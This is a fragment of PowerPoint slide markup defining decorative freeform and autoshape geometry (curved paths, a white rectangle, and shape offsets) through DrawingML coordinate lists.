                <a:lnTo>
                  <a:pt x="27261" y="166213"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17376" y="120902"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9208" y="74967"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2794" y="2844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5" name="Freeform 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1962150" y="752475"/>
            <a:ext cx="400050" cy="409575"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="400050" h="409575">
                <a:moveTo>
                  <a:pt x="200025" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="154155" y="5408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="112050" y="20814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74911" y="44986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43937" y="76694"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20327" y="114707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5281" y="157793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="204724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5281" y="251701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20327" y="294821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43937" y="332856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="74911" y="364578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="112050" y="388757"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="154155" y="404165"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="200025" y="409575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="245894" y="404165"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="287999" y="388757"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325138" y="364578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="356112" y="332856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379722" y="294821"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="394768" y="251701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="400050" y="204724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="394768" y="157793"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379722" y="114707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="356112" y="76694"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="325138" y="44986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="287999" y="20814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="245894" y="5408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="200025"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16" name="Freeform 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5500623"/>
            <a:ext cx="748030" cy="600710"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="748030" h="600710">
                <a:moveTo>
                  <a:pt x="747711" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="745906" y="46903"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="740578" y="92818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="731862" y="137613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719891" y="181153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="704799" y="223305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="686718" y="263935"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="665782" y="302911"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="642125" y="340099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="615879" y="375365"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="587180" y="408577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="556159" y="439600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="522950" y="468301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="487687" y="494548"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="450503" y="518207"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="411531" y="539143"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="370906" y="557225"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="328759" y="572318"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="285226" y="584289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240439" y="593005"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194531" y="598333"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147636" y="600138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100740" y="598333"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54831" y="593005"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10042" y="584289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="58152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7" name="Freeform 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2014473"/>
            <a:ext cx="748030" cy="3486150"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="748030" h="3486150">
                <a:moveTo>
                  <a:pt x="0" y="18615"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10046" y="15852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54834" y="7134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100741" y="1805"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147636" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="194531" y="1932"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240439" y="7258"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="285226" y="15972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="328759" y="27941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="370906" y="43031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="411531" y="61109"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="450503" y="82042"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="487687" y="105696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="522950" y="131938"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="556159" y="160635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="587180" y="191654"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="615879" y="224861"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="642125" y="260123"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="665782" y="297306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="686718" y="336278"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="704799" y="376906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="719891" y="419054"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="731862" y="462592"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="740578" y="507384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="745906" y="553299"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="747711" y="600201"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="747711" y="348615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8" name="Freeform 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5567426"/>
            <a:ext cx="938530" cy="790575"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="938530" h="790575">
                <a:moveTo>
                  <a:pt x="938211" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="936768" y="48153"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="932495" y="95543"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="925474" y="142088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="915788" y="187705"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="903519" y="232312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="888751" y="275825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="871566" y="318161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="852046" y="359239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="830275" y="398975"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="806335" y="437286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="780309" y="474091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="752279" y="509306"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="722328" y="542848"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="690539" y="574635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="656995" y="604584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="621778" y="632613"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="584971" y="658638"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546656" y="682577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="506917" y="704348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="465835" y="723867"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="423495" y="741052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379977" y="755820"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335366" y="768088"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289744" y="777774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="243193" y="784795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195796" y="789068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147636" y="790511"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99476" y="789068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52079" y="784795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5528" y="777774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="776600"/>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9" name="Freeform 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1766823"/>
            <a:ext cx="938530" cy="3801110"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="938530" h="3801110">
                <a:moveTo>
                  <a:pt x="0" y="13911"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5532" y="12737"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52082" y="5716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="99477" y="1442"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147636" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195796" y="1569"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="243193" y="5843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="289744" y="12864"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="335366" y="22550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379977" y="34818"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="423495" y="49586"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="465835" y="66772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="506917" y="86291"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="546656" y="108062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="584971" y="132002"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="621778" y="158029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="656995" y="186059"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="690539" y="216009"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="722328" y="247798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="752279" y="281343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="780309" y="316560"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="806335" y="353367"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="830275" y="391682"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="852046" y="431421"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="871566" y="472502"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="888751" y="514843"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="903519" y="558360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="915788" y="602971"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="925474" y="648594"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="932495" y="695145"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="936768" y="742542"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="938211" y="790701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="938211" y="380060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0" name="Freeform 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5624512"/>
            <a:ext cx="1129030" cy="981075"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1129030" h="981075">
                <a:moveTo>
                  <a:pt x="1128711" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1127580" y="47533"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1124220" y="94484"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1118683" y="140798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1111021" y="186427"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1101284" y="231317"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1089525" y="275417"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1075794" y="318677"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1060143" y="361045"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1042623" y="402469"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1023286" y="442898"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1002183" y="482281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="979366" y="520566"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="954886" y="557701"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="928794" y="593636"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901141" y="628319"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="871980" y="661699"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="841361" y="693724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="809336" y="724343"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="775956" y="753505"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="741273" y="781157"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="705338" y="807249"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="668202" y="831730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="629917" y="854547"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="590535" y="875650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550106" y="894987"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="508682" y="912506"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="466314" y="928157"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="423054" y="941888"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="378953" y="953648"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334063" y="963384"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="288435" y="971047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="242120" y="976583"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195170" y="979943"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147636" y="981075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100102" y="979943"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53152" y="976583"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6837" y="971047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="96989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1" name="Freeform 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1509649"/>
            <a:ext cx="1129030" cy="4115435"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1129030" h="4115435">
                <a:moveTo>
                  <a:pt x="0" y="11177"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6837" y="10028"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="53152" y="4491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100102" y="1131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="147636" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="195170" y="1131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="242120" y="4491"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="288435" y="10028"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="334063" y="17692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="378953" y="27429"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="423054" y="39190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="466314" y="52922"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="508682" y="68574"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="550106" y="86095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="590535" y="105434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="629917" y="126538"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="668202" y="149357"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="705338" y="173839"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="741273" y="199932"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="775956" y="227586"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="809336" y="256749"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="841361" y="287369"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="871980" y="319395"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="901141" y="352776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="928794" y="387459"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="954886" y="423395"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="979366" y="460531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1002183" y="498816"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1023286" y="538198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1042623" y="578627"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1060143" y="620050"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1075794" y="662416"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1089525" y="705675"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1101284" y="749774"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1111021" y="794661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1118683" y="840287"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1124220" y="886598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1127580" y="933545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1128711" y="981075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1128711" y="4114863"/>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2" name="Freeform 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4914900"/>
            <a:ext cx="2038350" cy="1762125"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2038350" h="1762125">
                <a:moveTo>
                  <a:pt x="0" y="1762125"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2038350" y="1762125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2038350" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1762125"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:alpha val="100000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="AutoShape 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1819275" y="61817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4" name="AutoShape 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1819275" y="66770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5" name="AutoShape 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1819275" y="6343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6" name="Freeform 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1819275" y="6515100"/>
            <a:ext cx="66675" cy="57150"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="66675" h="57150">
                <a:moveTo>
                  <a:pt x="33274" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="20359" y="2244"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9779"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AutoShape 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="157162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8" name="AutoShape 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="157162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157162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0" name="Freeform 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="157162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1" name="AutoShape 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="132397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2" name="AutoShape 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="132397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132397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4" name="Freeform 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="132397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5" name="AutoShape 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10858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6" name="AutoShape 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10858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7" name="AutoShape 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10858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8" name="Freeform 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10858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9" name="AutoShape 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8763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0" name="AutoShape 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8763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1" name="AutoShape 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8763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2" name="Freeform 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8763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3" name="AutoShape 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6286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4" name="AutoShape 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6286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5" name="AutoShape 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6286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6" name="Freeform 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6286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7" name="AutoShape 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810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8" name="AutoShape 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810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9" name="AutoShape 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810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0" name="Freeform 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3810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1" name="AutoShape 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142875"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2" name="AutoShape 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142875"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3" name="AutoShape 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142875"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4" name="Freeform 54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="142875"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5" name="AutoShape 55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9001125" y="257175"/>
            <a:ext cx="2905125" cy="42862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6" name="Freeform 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="2000250" cy="2105025"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2000250" h="2105025">
                <a:moveTo>
                  <a:pt x="1922457" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2057171"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="60397" y="2071140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="106298" y="2080010"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="152651" y="2087570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="199439" y="2093801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="246640" y="2098681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="294234" y="2102192"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="342202" y="2104313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="390525" y="2105025"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="438845" y="2104313"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="486812" y="2102192"/>
                </a:lnTo>
                <a:lnTo>
